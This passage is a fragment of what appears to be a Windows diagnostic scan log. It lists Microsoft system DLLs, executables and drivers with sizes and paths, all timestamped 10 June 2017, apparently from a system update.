2017-06-10 01:26 - 2017-06-10 01:26 - 01506712 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01474800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01459728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01455592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01450496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01333136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01275904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01266544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01219560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01141760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01120864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01102848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01078272 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01067008 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01035264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01028608 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00972800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00899584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00892416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSMDesktopProvider.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00846848 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00826368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSMDesktopProvider.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthSSO.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00754080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00730016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00712608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdbui.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00606960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00546208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-06-10 01:26 - 2017-06-10 01:26 - 00543648 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00439808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-06-10 01:26 - 2017-06-10 01:26 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00406064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DictationManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-06-10 01:26 - 2017-06-10 01:26 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00370928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00363424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00335808 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00287648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00211872 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\RstrtMgr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00188824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00181664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RstrtMgr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSM.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\embeddedmodesvc.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00144288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveExt.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSM.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00112544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrvext.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00086016 _____ C:\WINDOWS\system32\xboxgipsynthetic.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-06-10 01:26 - 2017-06-10 01:26 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-06-10 01:26 - 2017-06-10 01:26 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00059904 _____ C:\WINDOWS\SysWOW64\xboxgipsynthetic.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
